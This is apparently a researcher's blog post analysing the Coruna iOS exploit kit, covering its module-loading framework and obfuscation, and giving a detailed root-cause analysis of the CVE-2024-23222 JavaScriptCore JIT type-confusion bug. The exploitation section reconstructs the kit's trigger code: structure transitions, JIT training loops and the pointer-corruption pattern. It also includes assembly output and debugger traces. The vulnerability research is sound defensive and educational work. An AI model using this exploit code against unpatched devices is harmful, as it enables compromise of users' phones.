I've had a lot of fun diving into this exploit kit over the last few weeks; it really was a trip down memory lane to when I still did iOS security research as a hobby. Hanging around in voice calls and trying to figure out how each of the different stages worked was a blast, and I thought that before I forget everything, I should write it down.
If you are like me, you want to inspect every little stone as we make our way through the kit, but I also totally understand if you are here for a high-level overview. Because of this, I decided it's best to treat every subsection as standalone, which means it should be quite easy to skip any first- or second-level heading without losing too much context. Beyond that, I also decided to make every fourth-level heading collapsible and only discuss very deep technical details there, so that those can be skipped easily.
Similarly, I'm not sure how deep your level of knowledge is. Because of this, I am referencing other writeups on relevant topics in the reference section of the post.
Now enjoy :)
Google Threat Intelligence Group (GTIG) and iVerify both published blog posts on an exploit kit named Coruna, which supports iOS 13.0 - 17.2.1. They did not provide samples, but because GTIG published a list of URLs used in the attacks and some of them were still active, I was able to obtain a capture against iOS 17.1 and based my analysis on that.
On March 3rd, GTIG and iVerify both published blog posts about a nation-state iOS exploit kit they had been tracking for a while. It was initially used by a customer of a surveillance company and later in watering-hole attacks on Ukrainian websites and Chinese gambling websites. On one of these websites the attackers hosted a debug version of the kit, allowing GTIG to obtain exploit names (and probably also a lot of debug prints which I would've loved to have). Because of this they published a nice table containing all 23 exploits, with their names, purpose, CVE etc.:
| Exploit type | Internal name | Targeted versions | Fixed version | CVE |
|---|---|---|---|---|
| WebContent R/W | buffout | 13 to 15.1.1 | 15.2 | CVE-2021-30952 |
| WebContent R/W | jacurutu | 15.2 to 15.5 | 15.6 | CVE-2022-48503 |
| WebContent R/W | bluebird | 15.6 to 16.1.2 | 16.2 | No CVE |
| WebContent R/W | terrorbird | 16.2 to 16.5.1 | 16.6 | CVE-2023-43000 |
| WebContent R/W | cassowary | 16.6 to 17.2.1 | 16.7.5, 17.3 | CVE-2024-23222 |
| WebContent PAC bypass | breezy | 13 to 14.x | ? | No CVE |
| WebContent PAC bypass | breezy15 | 15 to 16.2 | ? | No CVE |
| WebContent PAC bypass | seedbell | 16.3 to 16.5.1 | ? | No CVE |
| WebContent PAC bypass | seedbell_16_6 | 16.6 to 16.7.12 | ? | No CVE |
| WebContent PAC bypass | seedbell_17 | 17 to 17.2.1 | ? | No CVE |
| WebContent sandbox escape | IronLoader | 16.0 to 16.3.1 (16.4.0 for <= A12) | 15.7.8, 16.5 | CVE-2023-32409 |
| WebContent sandbox escape | NeuronLoader | 16.4.0 to 16.6.1 (A13 - A16) | 17.0 | No CVE |
| PE | Neutron | 13.X | 14.2 | CVE-2020-27932 |
| PE (infoleak) | Dynamo | 13.X | 14.2 | CVE-2020-27950 |
| PE | Pendulum | 14 to 14.4.x | 14.7 | No CVE |
| PE | Photon | 14.5 to 15.7.6 | 15.7.7, 16.5.1 | CVE-2023-32434 |
| PE | Parallax | 16.4 to 16.7 | 17.0 | CVE-2023-41974 |
| PE | Gruber | 15.2 to 17.2.1 | 16.7.6, 17.3 | No CVE |
| PPL Bypass | Quark | 13.X | 14.5 | No CVE |
| PPL Bypass | Gallium | 14.x | 15.7.8, 16.6 | CVE-2023-38606 |
| PPL Bypass | Carbone | 15.0 to 16.7.6 | 17.0 | No CVE |
| PPL Bypass | Sparrow | 17.0 to 17.3 | 16.7.6, 17.4 | CVE-2024-23225 |
| PPL Bypass | Rocket | 17.1 to 17.4 | 16.7.8, 17.5 | CVE-2024-23296 |
This is the table as GTIG published it; there are two minor things I'm not sure about anymore: based on the selection code it seems like buffout might've been exploitable since iOS 11, and Rocket is listed under the 17.4 security bulletin. But the exploit bails early if the iOS version is older than iOS 13, so I don't have proof that buffout is exploitable on lower versions. As we will see during the analysis of
Besides this table, very little information was published about the vulnerabilities themselves, but GTIG mentioned that they are going to publish RCAs at a later point, so once that happens I will for sure link them here. An in-depth analysis of the implant has already been done by both iVerify and GTIG, which is why I won't focus on it in this post.
When the posts were released I was very excited, mainly because there hadn't been any large publications on iOS exploitation lately, but also because the table had some entries with no CVE and not even a fixed version, indicating to me that no root-cause analysis (RCA) had been done on these vulnerabilities yet. I was especially interested in the
But given that neither GTIG nor iVerify published any samples, looking at them myself initially didn't seem possible. Then I got word that some of the URLs listed in GTIG's post were still active and people were voluntarily infecting themselves in the hopes of a jailbreak. This is a very bad idea, and I still don't understand why GTIG published actively serving URLs, but it allowed me to obtain a sample and conduct this analysis. It will also likely enable a jailbreak on early versions of iOS 17. So, generally speaking, I welcome GTIG sharing samples, but ideally this should happen in a controlled fashion where they can, for example, leave out the JIT loader or the initial RCE stage so that others cannot easily weaponise the kit, while still allowing the exploits to be analysed and used in a jailbreak, which can then enable better analysis of future chains.
Thanks to Alfie I was able to obtain a raw capture against a phone running iOS 17.1. During initial analysis I thought that I'd eventually hit a wall because the exploit kit would do a Diffie-Hellman key exchange and then encrypt the next stages, but, as we will see, to my surprise this wasn't the case.
The capture had the following files in it:
377bed7460f7538f96bbad7bdc2b8294bdc54599.js
4817ea8063eb4480e915f1a4479c62ec774f52ce.min.js
4a75f0551eba446b4fa35127024a84b71d9688d6.js
6beef463953ff422511395b79735ec990bed65f4.js
7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.js
9af53c1bb40f0328841df6149f1ef94f5336ae11.js
bef10a7c014b826e9dd645984e80baf313c1635f.js
favicon.ico
group.html
It comes from one of the Chinese gambling websites, so I have their version of the kit and their implant. The other variants of the kit might be different, but given the background, I doubt either deployment made large changes.
In a very interesting turn of events, around three weeks later on the 18th, GTIG, iVerify and Lookout all published blog posts about another iOS exploit kit called "DarkSword". Lookout found it by following the C2 infrastructure of Coruna and spotting a similar-looking domain on the same IP address that served another exploit kit. Based on the kit later also being leaked on GitHub, I assume others did the same. So not only did GTIG expose actively serving URLs of Coruna, this also allowed the discovery of another kit. Because DarkSword is fully written in JavaScript and not obfuscated at all, it is a lot easier to analyze, and there already are some writeups available on it (for example on the kernel vulnerability). I might still decide to do another writeup on it and link it here if I find the time.
While DarkSword was used by the same operator as Coruna, the two kits are so different, and there is so much engineering around Coruna that a shared developer would have reused, that I don't think they were both developed by the same entity. Instead, it seems the operator sourced the kits from two different suppliers.
In this section I'll do a full analysis of the kit, starting with the landing page and ending with the SPTM/PPL bypass. Having only access to an iOS 17.1 capture, this analysis is limited to the exploits used in that version of the kit, so
This section covers the delivery mechanism of the exploit kit as well as the main JavaScript framework that orchestrates the exploitation, by loading different modules for the exploit stages. The modules themselves are further explored in the next sections.
The exploit kit was delivered on
The embedded JavaScript is divided into two sections: the first does the actual exploitation, while the second does fingerprinting. It's minified and slightly obfuscated; namely, there are three techniques employed:
I wasn't able to link the obfuscation patterns to a known public obfuscator (the closest I got was Metasploit's, but it seems to be a custom one).
There is nothing that can be done against the variable renaming, but for the integers and strings I decided to write a couple of regexes and then evaluate the expressions in place:
const stringRegex = /\[\d+(, ?\n?\d+)*\]\.map\((.) ?=> ?({return )?String\.fromCharCode\(\2 ?\^ ?(\d)+\)(;?})?\)\.join\(""\)/g;
const xorRegex = /\(-?(\d){3,} \^ -?(\d){3,}\)/g;
const addRegex = /\(-?(\d){3,} \+ -?(\d){3,}\)/g;
let output = fileText;
const matches = [...fileText.matchAll(stringRegex)];
for (const match of matches) {
const expr = match[0];
let replacement = '';
try {
replacement = eval(expr);
} catch (e) {
replacement = expr;
}
replacement = "\"" + replacement + "\"";
output = output.replace(expr, replacement);
}
...
After that I ran the deobfuscated minified JavaScript through
The second section only does fingerprinting, so to quickly summarise it, after 1s it will:
The first section will initialise one big object I named
The modules can be accessed via their hash, the two loaded ones are:
Based on their length, these hashes should be SHA1, but I wasn't able to find any matching string that would hash to them. As GTIG mentioned that they have a debug version of this kit, I'm wondering if hashes are generated on that version or if with that we would be able to get the real names.
The helper module contains classes to deal with numbers, as JavaScript cannot natively represent 64-bit integers. One class stores a 64-bit number in two 32-bit parts, handles inputs and outputs as JSValues, floats or BigInts, and does basic math operations on it. A second class converts between the different types using the well-known trick of sharing one ArrayBuffer between different types of JS arrays and a DataView. Besides that, there are functions for string handling, essentially converting between UTF-16 and UTF-8 and byte arrays, and doing string decompression based on LZW-like compression. There is also some glue code tying the different number representations together. That's something I noticed with this kit in general: there are often multiple implementations of the same logic, likely because different developer teams worked on different parts of the chain and, when everything was integrated, nobody did the engineering work to unify the codebase.
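The shared-buffer conversion trick the helper module builds on can be sketched in a few lines (function names here are mine, not the module's):

```javascript
// One 8-byte buffer viewed both as a double and as two 32-bit halves.
// Writing through one view and reading through the other reinterprets
// the raw bits (little-endian on all relevant platforms).
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u32 = new Uint32Array(buf);

function f2i(f) { // double -> {lo, hi} 32-bit halves of its bit pattern
    f64[0] = f;
    return { lo: u32[0], hi: u32[1] };
}

function i2f(lo, hi) { // 32-bit halves -> double with that bit pattern
    u32[0] = lo;
    u32[1] = hi;
    return f64[0];
}
```

For example, `f2i(1.0)` yields `{lo: 0, hi: 0x3ff00000}`, the IEEE-754 encoding of 1.0.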
Outside of the large dispatcher object the main script will set a base URL for the dispatcher to fetch the modules from and a cookie, which according to the blog posts is unique per victim. The cookie gets prepended to the module's hash and then a SHA1 hash of the whole thing is calculated by a JS SHA1 implementation, ".js" is added to it and the module is fetched from the base URL.
After 10ms (presumably to have the remainder of the page loaded) the main function is invoked and upon return its return value is sent back to the server. The main function will initialise the main exploit module which allows for the following configuration:
This errors out if it's not running in Safari or AppleWebKit, and parses the iOS version from the user agent. It seems like besides regular Safari, the exploit kit also supports running from the iTunes Store, indicated by matching against the
Afterwards the exploit main function will error out if it's running on macOS (detected via
Once fingerprinting is done, it selects an exploit module for WebContent R/W based on the iOS version. If none can be found it again bails (which would be the case for a device running iOS 17.3 or newer, for example); otherwise it invokes the module for up to 20 tries to get R/W. In the case of this capture,
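The selection and retry logic boils down to something like this (a sketch: the version ranges come from GTIG's table, but all function and variable names are assumptions):

```javascript
// WebContent R/W modules and the iOS versions they claim to support
const rwModules = [
    { name: "buffout",    min: [13, 0], max: [15, 1, 1] },
    { name: "jacurutu",   min: [15, 2], max: [15, 5] },
    { name: "bluebird",   min: [15, 6], max: [16, 1, 2] },
    { name: "terrorbird", min: [16, 2], max: [16, 5, 1] },
    { name: "cassowary",  min: [16, 6], max: [17, 2, 1] },
];

function cmpVersion(a, b) { // lexicographic version comparison
    for (let i = 0; i < Math.max(a.length, b.length); i++) {
        const d = (a[i] || 0) - (b[i] || 0);
        if (d !== 0) return d;
    }
    return 0;
}

function selectRwModule(version) { // null -> bail, e.g. on iOS 17.3+
    return rwModules.find(m =>
        cmpVersion(version, m.min) >= 0 && cmpVersion(version, m.max) <= 0) || null;
}

function runWithRetries(mod, maxTries = 20) { // invoke for up to 20 tries
    for (let i = 0; i < maxTries; i++) {
        try { return mod.run(); } catch (e) { /* retry */ }
    }
    throw new Error("no R/W after " + maxTries + " tries");
}
```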
With R/W it can detect PAC by comparing the higher 32 bits of a function pointer from a
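The idea of the check can be illustrated with stub primitives standing in for the exploit's real read primitive (everything here, including the addresses, is hypothetical; only the high-32-bit comparison reflects the described technique):

```javascript
// read64: reads a 64-bit value (as BigInt) from an address.
// On arm64e the PAC signature is stored in a pointer's upper bits, so a signed
// function pointer's top 32 bits differ from those of a plain heap pointer.
function detectPac(read64, funcPtrAddr, heapPtrAddr) {
    const funcPtr = read64(funcPtrAddr);
    const heapPtr = read64(heapPtrAddr);
    return (funcPtr >> 32n) !== (heapPtr >> 32n);
}
```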
If PAC is detected, it now needs to be defeated. For this, they call a helper function which will then load a PAC bypass module based on the iOS version and invoke it to export a
With the ability to R/W and call arbitrary functions, the kit wants to load native code and execute its LPE. For this it will load a final JavaScript module (in this capture,
Generally, the design is quite interesting: they maintain JS code execution while executing native code on another thread and use an array to communicate between the two. I'll further elaborate on this in the section about the MachO loader framework.
And that's the whole chain, let's have a look at the modules in detail:
Note: This is the first JSC JIT bug I have ever looked at in depth, so details might be a bit off. I'm more than happy to incorporate any corrections and will also link to other writeups should they come out.
The bug is a weakness in the property watchpoint mechanism of JSC that can be turned into a type confusion by racing the compiler thread against the main thread, leading to
And don't worry: half of the terms in the paragraph above I also didn't understand going into this, which is why I specifically wrote the next section to explain some concepts in more detail before talking about the bug, exploitation and escalation to R/W.
In order to fully understand what is going on, we have a lot of ground to cover. I'll try to summarise my whole mental model here, both to help less experienced readers follow along and to let more experienced ones point out flaws in it. That being said, the whole process is way too complex to do it justice in a single section, so I highly recommend reading this very long but also very good blog post on JIT in JSC and potentially this blog post series as well, which helped me understand some of the different JIT stages better.
JavaScript is a weakly typed language: the same variable can hold values of different types at runtime. For example, a variable can initially hold an integer and later a string. Because of this, even simple operations like addition have very complex implementations, as they need to account for all the different operand types ("adding" two strings concatenates them, for example). This makes JS execution quite slow, but the performance requirements of modern web applications demand that it somehow goes faster. To speed up execution, all modern browsers have a Just-In-Time (JIT) compiler, which takes the JS bytecode (the intermediate representation the interpreter executes) and compiles it to native machine code. Once compilation has finished, the browser jumps to the compiled code and executes it instead of interpreting the bytecode, which is much faster. But even that is not enough, because it basically just means web developers will write more code until websites lag again. So on top of this already very complex compilation process, the JIT does a lot of optimisation work to make the code run faster, which in turn creates a lot more complexity, and thereby attack surface for bugs.
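To make the weak typing concrete, the same `+` dispatches on the runtime types of its operands:

```javascript
function add(a, b) {
    return a + b; // the implementation must handle every type combination
}

add(1, 2);     // integer addition -> 3
add("a", "b"); // string concatenation -> "ab"
add(1, "b");   // number coerced to string -> "1b"
```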
As compilation itself is also a computationally expensive process, the JIT will only compile "hot" code, i.e. code that is executed many times, and in JSC a function is "tiered up" through several different JITs that apply increasingly aggressive optimisations, striking a good trade-off between compilation time and the time saved by faster execution.
Besides reducing the chance of wasted work, this also allows the runtime to gather (type) information about the code in a so-called profiling phase, which can then be used to do better optimisations in the actual compilation phase, leading to yet another performance gain.
There is one more part of the type system important for understanding this bug: JS objects are again a very generic type, which can be used in many different ways and should have different optimisations applied accordingly. Because of this, in JSC all objects hold a pointer to a so-called structure, which contains a description of the object, specifically which properties the object holds and where they are stored within it.
To make a more concrete example, if we have an object
During JIT compilation there are multiple phases; the relevant ones for us are Control Flow Analysis (CFA) and Constant Folding. During CFA the JIT turns type predictions into type proofs, for example allowing an add operation to emit only the integer addition instruction if it can prove that both operands are always integers (and will not overflow). Constant Folding is an optimisation that allows the JIT to precompute values during compilation, for example if we have
This goes beyond just simple arithmetic operations in JSC, for example if we have
JSC goes even further and tries to predict if
There are two types of watchpoints relevant for us: property replacement watchpoints and structure transition watchpoints.
Property watchpoints fire when a property of an object is changed, for example if we have
Structure transition watchpoints fire when the structure of an object changes, for example if we have
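For illustration, these are the JS-level operations that correspond to the two watchpoint types (the watchpoints themselves live inside JSC, so plain JS can only show the triggers):

```javascript
let o = { p1: 1 };

// Property replacement: p1 keeps its slot and o keeps its structure, but any
// JITed code that constant-folded o.p1 must be invalidated
// -> the property replacement watchpoint on p1 fires.
o.p1 = 2;

// Structure transition: adding p2 moves o to a new structure
// -> the structure transition watchpoint on the old structure fires.
o.p2 = 3;
```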
Cassowary was fixed as CVE-2024-23222 and the Apple advisory states
WebKit
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222
From that we get the Bugzilla ID
commit 64714692967ad278155fcae66c5cb0f853b3bf34
Author: Yusuke Suzuki <censored>
Date: Thu Jan 25 01:25:49 2024 -0800
[JSC] DFG constant property load should check the validity at the main thread
https://bugs.webkit.org/show_bug.cgi?id=267134
rdar://120443399
Reviewed by Mark Lam.
Consider the following case,
CheckStructure O, S1 | S3
GetByOffset O, offset
And S1 -> S2 -> S3 structure transition happens.
By changing object concurrently with the compiler, it is possible that we will constant fold the property with O + S2.
While we insert watchpoints into S1 and S3, we cannot notice the change of the property in S2.
If we change O to S3 before running code, CheckStructure passes and we can use a value loaded from O + S2.
1. If S1 and S3 transitions are both already watched by DFG / FTL, then we do not need to care about the issue.
CheckStructure ensures that O is S1 or S3. And both has watchpoints which fires when transition happens.
So, if we are transitioning from S1 to S2 while compiling, it already invalidates the code.
2. If there is only one Structure (S1), then we can keep the current optimization by checking this condition at the main thread.
CheckStructure ensures that O is S1. And this means that if the assumption is met at the main thread, then we can continue
using this code safely. To check this condition, we added DesiredObjectProperties, which records JSObject*, offset, value, and structure.
And at the end of compilation, in the main thread, we check this assumption is still met.
commit 66f60deae730514621d3f9c5e620aaa76e03f8f8
Author: Yusuke Suzuki <censored>
Date: Thu Jan 25 01:25:49 2024 -0800
[JSC] Remove DFGDesiredObjectProperties
https://bugs.webkit.org/show_bug.cgi?id=267134
rdar://120443399
Reviewed by Mark Lam.
When we limit the structure only one, there is no way to change the property without firing
property replacement watchpoint while keeping object's structure as specified. So removing DFGDesiredObjectProperties.
The change is in a function called
For this the old function first placed property replacement watchpoints on all the structures in the set, then took the cell lock on
The fix for this was to further restrict this optimisation to:
In this section we will explore the exploitation based on a deobfuscated and cleaned up version of the code.
Before we start, I want to mention that generally these exploits are developed in a closed-loop fashion, where the developer "dances" with the JIT till it gives them a desired code gen. Because of that some of the code might be a leftover from that process and might not be strictly needed for the exploit to work.
This is important to keep in mind since it means that there might not be a good rationale for every single line, but I'll still attempt to provide one.
The high-level idea of exploitation is to poison the JIT compiler's type information by having
This basically leads to the following code pattern that they build the exploit around:
let i32Arr = new Uint32Array(2);
let f64Arr = new Float64Array(i32Arr.buffer); // share the same buffer with i32Arr
function jitted_func() {
    // do magic
    // [...]
    let typeConfused = obj.p1; // thanks to CFA the JIT thinks obj.p1/typeConfused is always a 64-bit float array; in reality we pass an array with object pointers
    f64Arr[0] = typeConfused[1]; // because of this, this becomes a simple store, so we store the pointer as a float into the array
    i32Arr[0] = i32Arr[0] + 16; // then we increment the pointer by 0x10 (i32Arr and f64Arr share the same buffer/operate on the same memory)
    typeConfused[1] = f64Arr[0]; // and then we store it back; because of the type confusion this is again a simple store, but now the original array holds a pointer to the first property of the object instead of the JSCell header
}
Now in order to trigger this bug
function newTarget() {} // single constructor to have both structS1 and structS3 share the same structure type
let structS1 = Reflect.construct(Object, [], newTarget);
let structS3 = Reflect.construct(Object, [], newTarget);
// at this point structS1 and structS3 have the same structure
structS1.p1 = floatArrWProp1;
structS1.p2 = floatArrWProp1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
// now again structS1 and structS3 have the same structure, which is our "S1"
delete structS3.p2;
// this transferred structS3 to our "S2"
delete structS3.p1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
// and now it is our final "S3" structure
They then need to train the runtime to see
function toJIT(useS3) {
    let obj = structS1;
    if (useS3) {
        obj = structS3;
        (0)[0]
    }
    let typeConfused = obj.p1;
    if (useS3) typeConfused = floatArrWProp2;
    f64Arr[0] = typeConfused[1];
    i32Arr[0] = i32Arr[0] + 16;
    typeConfused[1] = f64Arr[0];
}
Now I'm not 100% sure why this exact construct is needed, but I can tell you that
The original exploit also had
There is one more caveat to this: after CFA the compiler will also have the constant folding pass, which will again call
Putting it all together, invocation of the function looks like this:
const jitIterTotal = 0x1000000;
const jitIterTrain = 0x20000;
for (let jitIterCnt = 0; jitIterCnt < jitIterTotal; jitIterCnt++) {
    if (jitIterCnt > jitIterTrain) {
        toJIT(false, true); // forcing compilation
    } else {
        toJIT(jitIterCnt % 2 && jitIterCnt < 256, jitIterCnt > 4096); // training
    }
    if (jitIterCnt == jitIterTrain) { delete structS1.p2; } // triggering structure transition to S2
}
// and then modify p1 outside of S1/S3 to avoid watchpoints
delete structS1.p1;
structS1.p1 = fakeFloatArr;
structS1.p2 = 1;
// structS1 is now S3 (to bypass the runtime check)
toJIT(false, false); // trigger
Here the second parameter is a fast path to completely skip execution in the function, presumably so as not to disturb the type information.
let victimObj = {prop1: 1, prop2: 2};
let fakeFloatArr = [1.1, victimObj];
And when the bug successfully triggers,
On its own this will rarely trigger the bug, as the race window between the two compiler phases is very hard to hit from JS. Because of this the exploit pads the function around the important code with dummy code to slow down the compilation process, which gives it roughly an 80% hit rate on my machine. The dummy code is just a simple loop that isn't easy to optimise out:
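Sketched, it could look like this (the loop shape and constants here are assumptions, the real exploit's padding differs):

```javascript
// A loop whose result depends on values the compiler cannot prove constant,
// so it survives optimisation, inflates compile time and widens the race window.
let sink = 0;
function padding(n) {
    for (let i = 0; i < n; i++) {
        sink += Math.fround(i * 1.0000001);
    }
    return sink;
}
```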
One more thing the exploit does that I don't have an explanation for is triggering an Eden GC right after the JIT code is generated:
for (let t = 0; t < 0x100000; t++) new Array(13.37, 13.37, 13.37, 13.37);
I think it might serve two purposes:
But the bug can be triggered without it.
In order to confirm the bug I used
While doing so I saw that in the unsuccessful case we constant fold the value of
Air BB#8: ; frequency = 1.000000
Air Predecessors: #6, #7
Air Move $0x101031390, %x0 ; folded constant
Air Move (%x0), %x0
Air Move32 -8(%x0), %x1
Air Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %x1, $1, $0x101031388
Air MoveDouble 8(%x0), %q0
[...]
Because of this I got the idea that
I decided to confirm that with lldb by setting a breakpoint on
To fully confirm the theory that this function is the reason for the different code gen, I used this breakpoint:
(lldb) break set -n tryGetConstantProperty
(lldb) break command add
> bt
> break set -o -a $lr -C "reg read x0" -C "c"
> c
> DONE
(lldb) c
Leading to the following output (filtered by "x0 ="):
x0 = 0x0000000101031388 x0 = 0x0000000101031388
x0 = 0x0000000101031388 x0 = 0x0000000101031388
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000101031388 x0 = 0x0000000101031388 <--- [0]
x0 = 0x0000000000000000 x0 = 0x0000000101031388 <--- [1] difference
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
And indeed looking at the backtraces
A successfully type-confused version generates the following Air assembly:
Air BB#8: ; frequency = 1.000000
Air Predecessors: #6, #7
Air Move 8(%tmp20), %tmp37 ; load structS1 butterfly
Air Move -16(%tmp37), %tmp25 ; load p1 from butterfly
; v-- bail on bad cell tag
Air Patch &BranchTest64(3,SameAsRep)1, NonZero, %tmp25, 0xfffe000000000002, %tmp25, %tmp25
Air Move 8(%tmp25), %tmp24 ; get p1 butterfly
Air Move32 -8(%tmp24), %tmp34 ; load publicLength from butterfly
Air Move $1, %tmp35 ; [1] index
; v-- bounds check
Air Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %tmp34, $1, %tmp25
Air MoveDouble 8(%tmp24), %ftmp1 ; raw double load from butterfly[1]
Air BB#8: ; frequency = 1.000000
Air Predecessors: #6, #7
Air Move 8(%x2), %x0 ; load obj butterfly
Air Move -16(%x0), %x1 ; load p1 from butterfly
Air Patch &Patchpoint0, $0x1034f4150 ; ???
Air Move $0xfffe000000000002, %x0 ; get expected cell tag
Air Patch &BranchTest64(3,SameAsRep)1, NonZero, %x1, %x0, %x1, %x1 ; bail on bad cell tag
Air Move 8(%x1), %x0 ; get typeConfused butterfly
Air Move32 -8(%x0), %x2 ; load publicLength from butterfly
Air Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %x2, $1, %x1 ; bounds check
Air MoveDouble 8(%x0), %q0 ; typeConfused[1] load as double
Air Patch &BranchDouble(3,SameAsRep)4, DoubleNotEqualOrUnordered, %q0, %q0, %x1 ; ???
Air Move $0x780e0000b0, %x2 ; f64Arr backend
Air MoveDouble %q0, (%x2) ; store typeConfused[1] into f64Arr[0]
Air Patch &Patchpoint0, $0x10206e488 ; ???
Air Patch &Patchpoint0, $0x10206e3c8 ; ???
Air Move32 (%x2), %x4 ; load i32Arr[0] as int
Air Move $65536, %x3 ; increment for pointer shift
Air AddLeftShift64 %x3, %x4, $12, %x3
Air Rshift64 %x3, $12, %x3
Air Move32 %x3, (%x2) ; store back incremented pointer into i32Arr[0]
Air Patch &Patchpoint0, $0x10206e3c8 ; ???
Air MoveDouble (%x2), %q0 ; load incremented pointer as double
Air Patch &Patchpoint0, $0x10206e488 ; ???
Air Patch &BranchDouble(3,SameAsRep)4, DoubleNotEqualOrUnordered, %q0, %q0, %q0, %x1, %q0 ; ???
Air MoveDouble %q0, 8(%x0) ; store incremented pointer back into typeConfused[1]
Air Move $10, %x0
Air Ret64 %x0
Another thing that helped me was looking at the structure IDs of all of the variables. For this we can download a vulnerable version of JSC and then use
After creation
Object: 0x1064f4150 with butterfly 0x0(base=0xfffffffffffffff8) (Structure 0x30000a780:[0xa780/42880, Object, (0/0, 0/0){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 42880
Object: 0x1064f4160 with butterfly 0x0(base=0xfffffffffffffff8) (Structure 0x30000a780:[0xa780/42880, Object, (0/0, 0/0){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 42880
After p1/p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43104
After structS3.p2 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a8d0:[0xa8d0/43216, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43216
After structS3.p1 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a940:[0xa940/43328, Object, (0/0, 2/4){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43328
After structS3.p1 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a9b0:[0xa9b0/43440, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43440
After structS3.p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43552
After structS1.p2 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a8d0:[0xa8d0/43216, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180]), StructureID: 43216
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p1 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a940:[0xa940/43328, Object, (0/0, 2/4){}, NonArray, Proto:0x106444180]), StructureID: 43328
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p1 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a9b0:[0xa9b0/43440, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180]), StructureID: 43440
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
let victimObj = {prop1: 1, prop2: 2}; // the exploit will eventually end up with a corrupted pointer to this object: instead of pointing to the object header it points to prop1&prop2, allowing us to forge an obj
let fakeFloatArr = [1.1, victimObj];
let floatArrWProp1 = [1.1, 1.1];
floatArrWProp1.prop = 1.1;
